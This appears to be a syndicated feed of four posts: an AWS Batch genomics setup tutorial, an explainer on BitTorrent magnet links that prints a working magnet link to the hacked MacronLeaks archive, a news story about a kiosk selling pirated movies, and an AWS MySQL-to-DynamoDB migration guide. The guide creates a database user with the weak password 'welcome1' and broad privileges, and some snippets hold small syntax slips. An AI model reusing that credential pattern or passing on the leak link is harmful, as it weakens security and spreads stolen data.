While you can use default Amazon ECS-optimized AMIs with AWS Batch, you can also provide your own image in managed compute environments. We will use this feature to provision additional scratch EBS storage on each of the instances that AWS Batch launches and also to encrypt both the Docker and scratch EBS volumes.

AWS Batch has the same requirements for your AMI as Amazon ECS. To build the custom image, modify the default Amazon ECS-Optimized Amazon Linux AMI in the following ways:

  • Attach a 1 TB scratch volume to /dev/sdb
  • Encrypt the Docker and new scratch volumes
  • Mount the scratch volume to /docker_scratch by modifying /etc/fstab

The first two tasks can be addressed when you create the custom AMI in the console. Spin up a small t2.micro instance, and proceed through the standard EC2 instance launch.

After your instance has launched, record the IP address and then SSH into the instance. Copy and paste the following code:

sudo yum -y update
sudo parted /dev/xvdb mklabel gpt
sudo parted /dev/xvdb mkpart primary 0% 100%
sudo mkfs -t ext4 /dev/xvdb1
sudo mkdir /docker_scratch
echo -e '/dev/xvdb1\t/docker_scratch\text4\tdefaults\t0\t0' | sudo tee -a /etc/fstab
sudo mount -a

This auto-mounts your scratch volume to /docker_scratch, which is your scratch directory for batch processing. Next, create your new AMI and record the image ID.

Creating the job queues

AWS Batch job queues are used to coordinate the submission of batch jobs. Your jobs are submitted to job queues, which can be mapped to one or more compute environments. Job queues have priority relative to each other. You can also specify the order in which they consume resources from your compute environments.

In this solution, use two job queues. The first is for high priority jobs, such as alignment or variant calling. Set this with a high priority (1000) and map back to the previously created compute environment. Next, set a second job queue for low priority jobs, such as quality statistics generation. To create these job queues, enter the following CLI commands:

aws batch create-job-queue --job-queue-name highPriority-${ENV} --compute-environment-order order=0,computeEnvironment=genomicsEnv-${ENV}  --priority 1000 --state ENABLED
aws batch create-job-queue --job-queue-name lowPriority-${ENV} --compute-environment-order order=0,computeEnvironment=genomicsEnv-${ENV}  --priority 1 --state ENABLED

Creating the job definitions

To run the Isaac aligner container image locally, supply the Amazon S3 locations for the FASTQ input sequences, the reference genome to align to, and the output BAM file. For more information, see tools/isaac/README.md.

The Docker container itself also requires some information on a suitable mountable volume so that it can read and write temporary files without running out of space.

Note: In the following example, the FASTQ files as well as the reference files to run are in a publicly available bucket.

FASTQ1=s3://aws-batch-genomics-resources/fastq/SRR1919605_1.fastq.gz
FASTQ2=s3://aws-batch-genomics-resources/fastq/SRR1919605_2.fastq.gz
REF=s3://aws-batch-genomics-resources/reference/isaac/
BAM=s3://mybucket/genomic-workflow/test_results/bam/

mkdir ~/scratch

docker run --rm -ti -v ${HOME}/scratch:/scratch $REPO_URI --bam_s3_folder_path $BAM \
--fastq1_s3_path $FASTQ1 \
--fastq2_s3_path $FASTQ2 \
--reference_s3_path $REF \
--working_dir /scratch 

Containers running locally can typically use whatever CPU and memory headroom the host has available. In AWS Batch, the CPU and memory requirements are hard limits and are allocated to the container image at runtime.

Isaac is a fairly resource-intensive algorithm, as it creates an uncompressed index of the reference genome in memory to match the query DNA sequences. The large memory space is shared across multiple CPU threads, and Isaac can scale almost linearly with the number of CPU threads given to it as a parameter.

To fit these characteristics, choose an optimal instance size to maximize the number of CPU threads based on a given large memory footprint, and deploy a Docker container that uses all of the instance resources. In this case, we chose a host instance with 80+ GB of memory and 32+ vCPUs. The following code is example JSON that you can pass to the AWS CLI to create a job definition for Isaac.

aws batch register-job-definition --job-definition-name isaac-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/isaac",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":80000,
"vcpus":32,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

You can copy and paste the following code for the other three job definitions:

aws batch register-job-definition --job-definition-name strelka-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/strelka",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":32000,
"vcpus":32,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

aws batch register-job-definition --job-definition-name snpeff-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/snpeff",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":10000,
"vcpus":4,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

aws batch register-job-definition --job-definition-name samtoolsStats-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/samtools_stats",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":10000,
"vcpus":4,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

The value for "image" comes from the previous post on creating a Docker image and publishing to ECR. The value for jobRoleArn you can find from the output of the CloudFormation template that you deployed earlier. In addition to providing the number of CPU cores and memory required by Isaac, you also give it a storage volume for scratch and staging. The volume comes from the previously defined custom AMI.

Testing the environment

After you have created the Isaac job definition, you can submit the job using the AWS Batch submitJob API action. While the base mappings for Docker run are taken care of in the job definition that you just built, the specific job parameters should be specified in the container overrides section of the API call. Here’s what this would look like in the CLI, using the same parameters as in the bash commands shown earlier:

aws batch submit-job --job-name testisaac --job-queue highPriority-${ENV} --job-definition isaac-${ENV}:1 --container-overrides '{
"command": [
			"--bam_s3_folder_path", "s3://mybucket/genomic-workflow/test_batch/bam/",
            "--fastq1_s3_path", "s3://aws-batch-genomics-resources/fastq/ SRR1919605_1.fastq.gz",
            "--fastq2_s3_path", "s3://aws-batch-genomics-resources/fastq/SRR1919605_2.fastq.gz",
            "--reference_s3_path", "s3://aws-batch-genomics-resources/reference/isaac/",
            "--working_dir", "/scratch",
			"—cmd_args", " --exome ",]
}'

When you execute a submitJob call, jobId is returned. You can then track the progress of your job using the describeJobs API action:

aws batch describe-jobs --jobs <jobId returned from submitJob>

You can also track the progress of all of your jobs in the AWS Batch console dashboard.

To see exactly where a RUNNING job is at, use the link in the AWS Batch console to direct you to the appropriate location in CloudWatch logs.
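
To pull the same information from a script instead, a boto3 sketch along
these lines looks up the job's status and, once a log stream exists,
fetches the container output from the /aws/batch/job CloudWatch Logs group:

import boto3

batch = boto3.client('batch', region_name='us-east-1')
logs = boto3.client('logs', region_name='us-east-1')

def print_job_logs(job_id):
    """Print the status of an AWS Batch job and, if available, its log output."""
    job = batch.describe_jobs(jobs=[job_id])['jobs'][0]
    print("{}: {}".format(job['jobName'], job['status']))

    log_stream = job.get('container', {}).get('logStreamName')
    if not log_stream:
        print("No log stream yet (the job has probably not started running).")
        return

    events = logs.get_log_events(
        logGroupName='/aws/batch/job',
        logStreamName=log_stream,
        startFromHead=True
    )
    for event in events['events']:
        print(event['message'])

# Example:
# print_job_logs('<jobId returned from submit-job>')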

Completing the batch environment setup

To finish, create a Lambda function to submit a generic AWS Batch job.

In the Lambda console, create a Python 2.7 Lambda function named batchSubmitJob. Copy and paste the following code. This is similar to the batch-submit-job-python27 Lambda blueprint. Use the LambdaBatchExecutionRole that you created earlier. For more information about creating functions, see Step 2.1: Create a Hello World Lambda Function.

from __future__ import print_function

import json
import boto3

batch_client = boto3.client('batch')

def lambda_handler(event, context):
    # Log the received event
    print("Received event: " + json.dumps(event, indent=2))
    # Get parameters for the SubmitJob call
    # http://docs.aws.amazon.com/batch/latest/APIReference/API_SubmitJob.html
    job_name = event['jobName']
    job_queue = event['jobQueue']
    job_definition = event['jobDefinition']
    
    # containerOverrides, dependsOn, and parameters are optional
    container_overrides = event['containerOverrides'] if event.get('containerOverrides') else {}
    parameters = event['parameters'] if event.get('parameters') else {}
    depends_on = event['dependsOn'] if event.get('dependsOn') else []
    
    try:
        response = batch_client.submit_job(
            dependsOn=depends_on,
            containerOverrides=container_overrides,
            jobDefinition=job_definition,
            jobName=job_name,
            jobQueue=job_queue,
            parameters=parameters
        )
        
        # Log response from AWS Batch
        print("Response: " + json.dumps(response, indent=2))
        
        # Return the jobId
        event['jobId'] = response['jobId']
        return event
    
    except Exception as e:
        print(e)
        message = 'Error submitting Batch Job'
        print(message)
        raise Exception(message)
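
To try the function out, you can configure a test event in the Lambda
console or invoke it from a script. The queue and job definition names
below are the illustrative ones used earlier in this post; substitute your
own values.

import json

import boto3

lambda_client = boto3.client('lambda', region_name='us-east-1')

# Illustrative test event: submit a job to the low priority queue.
test_event = {
    "jobName": "batch-submit-test",
    "jobQueue": "lowPriority-myenv",
    "jobDefinition": "samtoolsStats-myenv:1",
    "containerOverrides": {},
    "dependsOn": [],
    "parameters": {}
}

response = lambda_client.invoke(
    FunctionName='batchSubmitJob',
    InvocationType='RequestResponse',
    Payload=json.dumps(test_event)
)
print(json.loads(response['Payload'].read()))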

Conclusion

In part 3 of this series, you successfully set up your data processing, or batch, environment in AWS Batch. We also provided a Python script in the corresponding GitHub repo that takes care of all of the above CLI arguments for you, as well as building out the job definitions for all of the jobs in the workflow: Isaac, Strelka, SAMtools, and snpEff. You can check the script’s README for additional documentation.

In Part 4, you’ll cover the workflow layer using AWS Step Functions and AWS Lambda.

Please leave any questions and comments below.

Hacker dumps, magnet links, and you

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/05/hacker-dumps-magnet-links-and-you.html

In an excellent post pointing out Wikileaks deserves none of the credit given them in the #MacronLeaks, the author erroneously stated that after Archive.org took down the files, Wikileaks provided links to a second archive. This is not true. Instead, Wikileaks simply pointed to what’s known as “magnet links” of the first archive. Understanding magnet links is critical to understanding all these links and dumps, so I thought I’d describe them.

The tl;dr version is this: anything published via BitTorrent has a matching “magnet link” address, and the contents can still be reached via magnet links when the original publisher goes away.

In this case, the leaker uploaded to “archive.org”, a popular Internet archiving resource. This website allows you to either download files directly, which is slow, or via peer-to-peer using BitTorrent, which is fast. As you know, BitTorrent works by all the downloaders exchanging pieces with each other, rather than getting them from the server. I give you a piece you don’t have, in exchange for a piece I don’t have.

BitTorrent, though, still requires a “torrent” (a ~30k file that lists all the pieces) and a “tracker” (http://bt1.archive.org:6969/announce) that keeps a list of all the peers so they can find each other. The tracker also makes sure that every piece is available from at least one peer.

When “archive.org” realized what was happening, they deleted the leaked files, the torrent, and the tracker entry.

However, BitTorrent has another feature called “magnet links”. This is simply the “hash” of the “torrent” file contents, which looks something like “06724742e86176c0ec82e294d299fba4aa28901a“. (This isn’t a hash of the entire file, but just the important parts, such as the filenames and sizes).

Along with downloading files, BitTorrent software on your computer also participates in a “distributed hash” network. When using a torrent file to download, your BitTorrent software still tells other random BitTorrent clients about the hash. Knowledge of this hash thus spreads throughout the BitTorrent world. It’s only 20 bytes in size, so the average BitTorrent client can keep track of millions of such hashes while consuming very little memory or bandwidth.

If somebody decides they want to download the BitTorrent with that hash, they broadcast that request throughout this “distributed hash” network until they find one or more people with the full torrent. They then get the torrent description file from them, and also a list of peers in the “swarm” who are downloading the file.

Thus, when the original torrent description file, the tracker, and original copy goes away, you can still locate the swarm of downloaders through this hash. As long as all the individual pieces exist in the swarm, you can still successfully download the original file.

In this case, one of the leaked documents was a 2.3 gigabyte file called “langannerch.rar”. The torrent description file called “langanerch_archive.torrent” is 26 kilobytes in size. The hash (magnet link) is 20 bytes in size, written “magnet:?xt=urn:btih:06724742e86176c0ec82e294d299fba4aa28901a“. If you’ve got BitTorrent software installed and click on the link, you’ll join the swarm and start downloading the file, even though the original torrent/tracker/files have gone away.
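
For the curious, here is a small Python sketch of how such a magnet link
can be derived from a .torrent file. It assumes the third-party bencodepy
package for parsing the bencoded metadata; the info-hash is the SHA-1
digest of the re-encoded “info” dictionary, which covers the file names,
sizes, and piece hashes, but not the tracker URL.

import hashlib
import sys

import bencodepy   # assumed third-party dependency: pip install bencodepy

def magnet_from_torrent(path):
    """Compute a torrent's info-hash and wrap it in a magnet link."""
    with open(path, "rb") as f:
        metadata = bencodepy.decode(f.read())
    info = bencodepy.encode(metadata[b"info"])
    info_hash = hashlib.sha1(info).hexdigest()
    return "magnet:?xt=urn:btih:{}".format(info_hash)

if __name__ == "__main__":
    print(magnet_from_torrent(sys.argv[1]))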

According to my BitTorrent client, there are currently 108 people in the swarm downloading this file world-wide. I’m currently connected to 11 of them. Most of them appear to be located in France.

Looking at the General tab, I see that “availability” is 2.95. That means there exist 2.95 complete copies of the download. In other words, if there are 20 pieces, it means that for one of the pieces in the swarm, only 2 people have it. This is dangerously small — if those two people leave the network, then a complete copy of the dump will no longer exist in the swarm, and it’ll be impossible to download it all.

Such dumps can remain popular enough for years after the original tracker/torrent has disappeared, but at some point, a critical piece disappears, and it becomes impossible for anybody to download more than 99.95%, with everyone in the swarm waiting for that last piece. If you read this blogpost 6 months from now, you are likely to see 10 people in the swarm, all stuck at 99.95% complete.

Conclusion


The upshot of this is that it’s hard to censor BitTorrent, because all torrents also exist as magnet links. It took only a couple of hours for Archive.org to take down the tracker/torrents/files, but after complete downloads were out in the swarm, all anybody needed was the hash of the original torrent to create a magnet link to the data. Those magnet links had already been published by many people. The Wikileaks tweet that linked to them was fairly late, all things considered; other people had already published them.

ATM-Style Kiosk Pumps Out Pirate Movies to USB Sticks

Post Syndicated from Andy original https://torrentfreak.com/atm-style-kiosk-pumps-out-pirate-movies-to-usb-sticks-170430/

For more than 30 years, consumers have obtained music and movies written to polycarbonate discs. CD, DVD and now Blu-ray discs are recognizable across the world as a cheap and pretty reliable carrier for large volumes of digital data.

While it may take a while before Blu-ray takes its final breaths, CDs and DVDs are already on borrowed time. For the younger generation already accustomed to storing huge amounts of data on tiny MicroSD cards and USB sticks, a plastic disc carrying content is almost as outdated as a vinyl record.

With this in mind, millions of consumers would welcome the idea of getting their movies in convenient formats such as AVI or MP4. This would enable them to freely move content from device to device, without having to spend more money. Of course, entertainment companies don’t like that idea at all, especially when it comes to movies.

That’s where SwiftMedia comes in, and it’s a sight to behold.

Spotted by a TorrentFreak reader in a shopping mall in Ethiopia, this bright yellow kiosk looks like an ATM. However, on closer inspection it reveals itself to be a self-service media machine that does everything that RedBox can do (and more) without a plastic disc in sight.

A SwiftMedia terminal in situ (credit)

“At the beginning of this year, All Mart (the Walmart equivalent here) brought in a new machine. It’s basically a monitor with a USB port but shaped like an ATM. It’s called SwiftMedia and there’s a guy who ‘maintains’ it,” our source explains.

“Basically you go to this very big store and you approach the machine and you plug in a USB drive. The screen will turn on and it will let you browse through a massive archive of movies.”

Screen close-up

As mentioned earlier, this is a completely disc-less system, meaning that transfers of all content purchased from the machine end up on a customer-provided USB stick. Needless to say, DRM and copyright protection aren’t high on the agenda for this unusual and innovative machine.

All the movies – on USB

Prices are cheap too, with packages available for 25, 50 and 100 birr ($1, $2 and $3). Feature movies reportedly cost between 3 and 5 birr (13 to 22 cents) depending on the movie release date, with older movies costing more. Documentaries weigh in at the top of the range with single songs and TV shows costing 13 cents.

“At first I assumed these movies had their rights lifted or something because well, you know, but then I later found out that the movies I had first seen were just there on release day,” our source continues.

“Apparently the maintenance guy torrents all day and stores the data on his drive, the drive shown by the SwiftMedia monitor. This would not have been a big deal as this is Ethiopia and the allegedly democratic government has bigger issues.”

Of course, something like this wouldn’t last five minutes in the West and certainly wouldn’t appear in a shopping mall, let alone Walmart. So TorrentFreak contacted Escape Computing, the company that appears to be behind the project, to find out more about their enterprise.

At the time of publication we had received no response, but we did manage to track down a job listing posted last year where the company sought an individual to act in a sales and technical capacity.

It’s not clear whether the position was filled but whoever got the job certainly has a unique role to fulfill in this unusual yet somewhat innovative project.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Near Zero Downtime Migration from MySQL to DynamoDB

Post Syndicated from YongSeong Lee original https://aws.amazon.com/blogs/big-data/near-zero-downtime-migration-from-mysql-to-dynamodb/

Many companies consider migrating from relational databases like MySQL to Amazon DynamoDB, a fully managed, fast, highly scalable, and flexible NoSQL database service. For example, DynamoDB can increase or decrease capacity based on traffic, in accordance with business needs. The total cost of servicing can be optimized more easily than for the typical media-based RDBMS.

However, migrations can have two common issues:

  • Service outages caused by migration downtime, especially when customer service must be seamlessly available 24/7/365
  • Different key design between RDBMS and DynamoDB

This post introduces two methods of seamlessly migrating data from MySQL to DynamoDB, minimizing downtime and converting the MySQL key design into one more suitable for NoSQL.

AWS services

I’ve included sample code that uses the following AWS services:

  • AWS Database Migration Service (AWS DMS) can migrate your data to and from most widely used commercial and open-source databases. It supports homogeneous and heterogeneous migrations between different database platforms.
  • Amazon EMR is a managed Hadoop framework that helps you process vast amounts of data quickly. Build EMR clusters easily with preconfigured software stacks that include Hive and other business software.
  • Amazon Kinesis can continuously capture and retain a vast amount of data such as transactions, IT logs, or clickstreams for up to 7 days.
  • AWS Lambda helps you run your code without provisioning or managing servers. Your code can be automatically triggered by other AWS services such as Amazon Kinesis Streams.

Migration solutions

Here are the two options I describe in this post:

  1. Use AWS DMS

AWS DMS supports migration to a DynamoDB table as a target. You can use object mapping to restructure original data to the desired structure of the data in DynamoDB during migration.

  2. Use EMR, Amazon Kinesis, and Lambda with custom scripts

Consider this method when more complex conversion processes and flexibility are required. Fine-grained user control is needed for grouping MySQL records into fewer DynamoDB items, determining attribute names dynamically, adding business logic programmatically during migration, supporting more data types, or adding parallel control for one big table.

After the initial load/bulk-puts are finished, and the most recent real-time data is caught up by the CDC (change data capture) process, you can change the application endpoint to DynamoDB.

The method of capturing changed data in option 2 is covered in the AWS Database post Streaming Changes in a Database with Amazon Kinesis. All code in this post is available in the big-data-blog GitHub repo, including test codes.

Solution architecture

The following diagram shows the overall architecture of both options.

Option 1:  Use AWS DMS

This section discusses how to connect to MySQL, read the source data, and then format the data for consumption by the target DynamoDB database using DMS.

Create the replication instance and source and target endpoints

Create a replication instance that has sufficient storage and processing power to perform the migration job, as mentioned in the AWS Database Migration Service Best Practices whitepaper. For example, if your migration involves a large number of tables, or if you intend to run multiple concurrent replication tasks, consider using one of the larger instances. The service consumes a fair amount of memory and CPU.

Create a MySQL user for DMS with the SUPER and REPLICATION CLIENT privileges, so that DMS can connect to MySQL and read the source data. Enable the binary log and set the binlog_format parameter to ROW for CDC in the MySQL configuration. For more information about how to use DMS, see Getting Started in the AWS Database Migration Service User Guide.

mysql> CREATE USER 'repl'@'%' IDENTIFIED BY 'welcome1';
mysql> GRANT all ON <database name>.* TO 'repl'@'%';
mysql> GRANT SUPER,REPLICATION CLIENT  ON *.* TO 'repl'@'%';

Before you begin to work with a DynamoDB database as a target for DMS, make sure that you create an IAM role for DMS to assume, and grant access to the DynamoDB target tables. Two endpoints must be created to connect the source and target. The following screenshot shows sample endpoints.

The following screenshot shows the details for one of the endpoints, source-mysql.

Create a task with an object mapping rule

In this example, assume that the MySQL table has a composite primary key (customerid + orderid + productid). You are going to restructure the key to the desired structure of the data in DynamoDB, using an object mapping rule.

In this case, the DynamoDB table has the hash key that is a combination of the customerid and orderid columns, and the sort key is the productid column. However, the partition key should be decided by the user in an actual migration, based on data ingestion and access pattern. You would usually use high-cardinality attributes. For more information about how to choose the right DynamoDB partition key, see the Choosing the Right DynamoDB Partition Key AWS Database blog post.

DMS automatically creates a corresponding attribute on the target DynamoDB table for the quantity column from the source table because rule-action is set to map-record-to-record and the column is not listed in the exclude-columns attribute list. For more information about map-record-to-record and map-record-to-document, see Using an Amazon DynamoDB Database as a Target for AWS Database Migration Service.

Migration starts immediately after the task is created, unless you clear the Start task on create option. I recommend enabling logging to make sure that you are informed about what is going on with the migration task in the background.

The following screenshot shows the task creation page.

You can use the console to specify the individual database tables to migrate and the schema to use for the migration, including transformations. On the Guided tab, use the Where section to specify the schema, table, and action (include or exclude). Use the Filter section to specify the column name in a table and the conditions to apply.

Table mappings also can be created in JSON format. On the JSON tab, check Enable JSON editing.

Here’s an example of an object mapping rule that determines where the source data is located in the target. If you copy the code, replace the values of the following attributes. For more examples, see Using an Amazon DynamoDB Database as a Target for AWS Database Migration Service.

  • schema-name
  • table-name
  • target-table-name
  • mapping-parameters
  • attribute-mappings
{
  "rules": [
   {
      "rule-type": "selection",
      "rule-id": "1",
      "rule-name": "1",
      "object-locator": {
        "schema-name": "mydatabase",
        "table-name": "purchase"
      },
      "rule-action": "include"
    },
    {
      "rule-type": "object-mapping",
      "rule-id": "2",
      "rule-name": "2",
      "rule-action": "map-record-to-record",
      "object-locator": {
        "schema-name": "mydatabase",
        "table-name": "purchase"
 
      },
      "target-table-name": "purchase",
      "mapping-parameters": {
        "partition-key-name": "customer_orderid",
        "sort-key-name": "productid",
        "exclude-columns": [
          "customerid",
          "orderid"           
        ],
        "attribute-mappings": [
          {
            "target-attribute-name": "customer_orderid",
            "attribute-type": "scalar",
            "attribute-sub-type": "string",
            "value": "${customerid}|${orderid}"
          },
          {
            "target-attribute-name": "productid",
            "attribute-type": "scalar",
            "attribute-sub-type": "string",
            "value": "${productid}"
          }
        ]
      }
    }
  ]
}

Start the migration task

If the target table specified in the target-table-name property does not exist in DynamoDB, DMS creates the table according to data type conversion rules for source and target data types. There are many metrics to monitor the progress of migration. For more information, see Monitoring AWS Database Migration Service Tasks.
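
Alternatively, if you prefer to create the target table yourself before starting the task (for example, to control the provisioned write capacity used during the load), a minimal boto3 sketch is shown below. It is not part of the original walkthrough: the table and key names match the object mapping example above, while the region and capacity values are assumptions you should size for your own migration.

import boto3

dynamodb = boto3.client('dynamodb', region_name='us-east-1')  # region is an assumption

# Pre-create the "purchase" table with the same keys as the object mapping rule:
# partition key "customer_orderid" and sort key "productid", both strings.
dynamodb.create_table(
    TableName='purchase',
    AttributeDefinitions=[
        {'AttributeName': 'customer_orderid', 'AttributeType': 'S'},
        {'AttributeName': 'productid', 'AttributeType': 'S'},
    ],
    KeySchema=[
        {'AttributeName': 'customer_orderid', 'KeyType': 'HASH'},
        {'AttributeName': 'productid', 'KeyType': 'RANGE'},
    ],
    ProvisionedThroughput={'ReadCapacityUnits': 5, 'WriteCapacityUnits': 2000},  # assumed values
)

# Wait until the table is ACTIVE before starting the DMS task.
dynamodb.get_waiter('table_exists').wait(TableName='purchase')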

The following screenshot shows example events and errors recorded by CloudWatch Logs.

DMS replication instances that you used for the migration should be deleted once all migration processes are completed. Any CloudWatch logs data older than the retention period is automatically deleted.

Option 2: Use EMR, Amazon Kinesis, and Lambda

This section discusses an alternative option using EMR, Amazon Kinesis, and Lambda to provide more flexibility and precise control. If you have a MySQL replica in your environment, it would be better to dump data from the replica.

Change the key design

When you decide to change your database from an RDBMS to NoSQL, you need to find a key design that is more suitable for NoSQL, for performance as well as cost-effectiveness.

Similar to option #1, assume that the MySQL source has a composite primary key (customerid + orderid + productid). However, for this option, group the MySQL records into fewer DynamoDB items by customerid (hash key) and orderid (sort key). Also, remove the last column (productid) of the composite key by converting each productid value in MySQL into an attribute name in DynamoDB, with the corresponding quantity as the attribute value.

This conversion method reduces the number of items. You can retrieve the same amount of information with fewer read capacity units, resulting in cost savings and better performance. For more information about how to calculate read/write capacity units, see Provisioned Throughput.
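
To make the conversion concrete, the hypothetical snippet below collapses three MySQL rows that share the same customerid and orderid into a single DynamoDB item, turning each productid value into an attribute name whose value is the quantity. The table name and sample values are assumptions used only for illustration; they follow the naming in this post.

import boto3

# Three MySQL rows that share the same (customerid, orderid) prefix of the composite key
mysql_rows = [
    {'customerid': 'customer1', 'orderid': 'order1', 'productid': 'product1', 'quantity': 2},
    {'customerid': 'customer1', 'orderid': 'order1', 'productid': 'product2', 'quantity': 1},
    {'customerid': 'customer1', 'orderid': 'order1', 'productid': 'product3', 'quantity': 5},
]

# Collapse them into one DynamoDB item: hash key + sort key + one attribute per product
item = {'customerid': mysql_rows[0]['customerid'], 'orderid': mysql_rows[0]['orderid']}
for row in mysql_rows:
    item[row['productid']] = str(row['quantity'])  # the productid value becomes the attribute name

table = boto3.resource('dynamodb').Table('purchase')  # table name is an assumption
table.put_item(Item=item)

# Resulting item:
# {'customerid': 'customer1', 'orderid': 'order1',
#  'product1': '2', 'product2': '1', 'product3': '5'}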

Migration steps

Option 2 has two paths for migration, performed at the same time:

  • Batch-puts: Export MySQL data, upload it to Amazon S3, and import into DynamoDB.
  • Real-time puts: Capture changed data in MySQL, send the insert/update/delete transaction to Amazon Kinesis Streams, and trigger the Lambda function to put data into DynamoDB.

To maintain data consistency and integrity, capturing and feeding data to Amazon Kinesis Streams should start before the batch-puts process. The Lambda function should stand by, and the stream should retain the captured data until the batch-puts process on EMR finishes. Here’s the order:

  1. Start real-time puts to Amazon Kinesis Streams.
  2. As soon as real-time puts commences, start batch-puts.
  3. After batch-puts finishes, trigger the Lambda function to execute put_item from Amazon Kinesis Streams to DynamoDB.
  4. Change the application endpoints from MySQL to DynamoDB.

Step 1:  Capture changing data and put into Amazon Kinesis Streams

First, create an Amazon Kinesis stream to retain transaction data from MySQL, as sketched below. Set the Data retention period value based on your estimate for the batch-puts migration process. For data integrity, the retention period should be long enough to hold all transactions until the batch-puts migration finishes. However, you do not necessarily need to select the maximum retention period; it depends on the amount of data to migrate.
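
As a rough sketch (not part of the original walkthrough), the stream and its retention period could be created with boto3 before the binlog reader starts. The stream name, shard count, and 72-hour retention below are assumptions; size them to your own data volume and expected batch-puts duration.

import boto3

kinesis = boto3.client('kinesis')

# Create the stream that will buffer MySQL binlog events (shard count is an assumption)
kinesis.create_stream(StreamName='mysql-cdc-stream', ShardCount=2)
kinesis.get_waiter('stream_exists').wait(StreamName='mysql-cdc-stream')

# The default retention is 24 hours; extend it so events are kept until batch-puts finishes
kinesis.increase_stream_retention_period(
    StreamName='mysql-cdc-stream',
    RetentionPeriodHours=72,  # assumed value; must cover the whole batch-puts window
)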

In the MySQL configuration, set binlog_format to ROW to capture transactions by using the BinLogStreamReader module. The log_bin parameter must be set as well to enable the binlog. For more information, see the Streaming Changes in a Database with Amazon Kinesis AWS Database blog post.

 

[mysqld]
secure-file-priv = ""
log_bin=/data/binlog/binlog
binlog_format=ROW
server-id = 1
tmpdir=/data/tmp

The following sample code is a Python example that captures transactions and sends them to Amazon Kinesis Streams.

 

#!/usr/bin/env python
import json

import boto3
from pymysqlreplication import BinLogStreamReader
from pymysqlreplication.row_event import (
  DeleteRowsEvent,
  UpdateRowsEvent,
  WriteRowsEvent,
)

def main():
  kinesis = boto3.client("kinesis")

  stream = BinLogStreamReader(
    connection_settings= {
      "host": "<host IP address>",
      "port": <port number>,
      "user": "<user name>",
      "passwd": "<password>"},
    server_id=100,
    blocking=True,
    resume_stream=True,
    only_events=[DeleteRowsEvent, WriteRowsEvent, UpdateRowsEvent])

  for binlogevent in stream:
    for row in binlogevent.rows:
      event = {"schema": binlogevent.schema,
      "table": binlogevent.table,
      "type": type(binlogevent).__name__,
      "row": row
      }

      kinesis.put_record(StreamName="<Amazon Kinesis stream name>", Data=json.dumps(event), PartitionKey="default")
      print json.dumps(event)

if __name__ == "__main__":
  main()

The following code is sample JSON data generated by the Python script. The type attribute defines the transaction recorded by that JSON record:

  • WriteRowsEvent = INSERT
  • UpdateRowsEvent = UPDATE
  • DeleteRowsEvent = DELETE
{"table": "purchase_temp", "row": {"values": {"orderid": "orderidA1", "quantity": 100, "customerid": "customeridA74187", "productid": "productid1"}}, "type": "WriteRowsEvent", "schema": "test"}
{"table": "purchase_temp", "row": {"before_values": {"orderid": "orderid1", "quantity": 1, "customerid": "customerid74187", "productid": "productid1"}, "after_values": {"orderid": "orderid1", "quantity": 99, "customerid": "customerid74187", "productid": "productid1"}}, "type": "UpdateRowsEvent", "schema": "test"}
{"table": "purchase_temp", "row": {"values": {"orderid": "orderid100", "quantity": 1, "customerid": "customerid74187", "productid": "productid1"}}, "type": "DeleteRowsEvent", "schema": "test"}

Step 2. Dump data from MySQL to DynamoDB

The easiest way is to use DMS, which recently added Amazon S3 as a migration target. For an S3 target, both full load and CDC data is written to CSV format. However, CDC is not a good fit as UPDATE and DELETE statements are not supported. For more information, see Using Amazon S3 as a Target for AWS Database Migration Service.

Another way to upload data to Amazon S3 is to use the INTO OUTFILE SQL clause and the aws s3 sync CLI command in parallel with your own script. The degree of parallelism depends on your server capacity and local network bandwidth. You might find a third-party tool useful, such as pt-archiver (part of the Percona Toolkit; see the appendix for details).

SELECT * FROM purchase WHERE <condition_1>
INTO OUTFILE '/data/export/purchase/1.csv' FIELDS TERMINATED BY ',' ESCAPED BY '\\' LINES TERMINATED BY '\n';
SELECT * FROM purchase WHERE <condition_2>
INTO OUTFILE '/data/export/purchase/2.csv' FIELDS TERMINATED BY ',' ESCAPED BY '\\' LINES TERMINATED BY '\n';
...
SELECT * FROM purchase WHERE <condition_n>
INTO OUTFILE '/data/export/purchase/n.csv' FIELDS TERMINATED BY ',' ESCAPED BY '\\' LINES TERMINATED BY '\n';

I recommend the aws s3 sync command for this use case. This command works internally with the S3 multipart upload feature. Pattern matching can exclude or include particular files. In addition, if the sync process crashes in the middle of processing, you do not need to upload the same files again. The sync command compares the size and modified time of files between local and S3 versions, and synchronizes only local files whose size and modified time are different from those in S3. For more information, see the sync command in the S3 section of the AWS CLI Command Reference.

$ aws s3 sync /data/export/purchase/ s3://<your bucket name>/purchase/ 
$ aws s3 sync /data/export/<other path_1>/ s3://<your bucket name>/<other path_1>/
...
$ aws s3 sync /data/export/<other path_n>/ s3://<your bucket name>/<other path_n>/ 

After all data is uploaded to S3, put it into DynamoDB. There are two ways to do this:

  • Use Hive with an external table
  • Write MapReduce code

Hive with an external table

Create a Hive external table against the data on S3 and insert it into another external table against the DynamoDB table, using the org.apache.hadoop.hive.dynamodb.DynamoDBStorageHandler property. To improve productivity and scalability, consider using Brickhouse, which is a collection of UDFs for Hive.

